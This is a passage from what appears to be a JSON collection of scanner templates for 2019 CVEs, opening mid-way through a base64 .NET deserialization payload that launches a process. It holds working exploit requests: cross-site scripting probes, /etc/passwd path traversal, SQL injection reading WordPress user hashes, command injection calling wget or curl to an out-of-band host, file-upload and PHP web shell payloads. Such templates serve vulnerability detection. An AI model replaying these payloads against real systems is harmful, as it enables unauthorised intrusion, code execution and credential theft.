BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19411","info":{"name":"Huawei Firewall - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/umweb/../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains_any(body, \"\\\"users\\\":\",\"\\\"usuario\\\":\")","contains_all(body, \"\\\"total\\\":\", \"\\\"header\\\":\")","status_code == 200 || status_code == 404"],"condition":"and"},{"type":"word","part":"body","words":["total\":0"],"negative":true}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/api-bearer-auth/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site 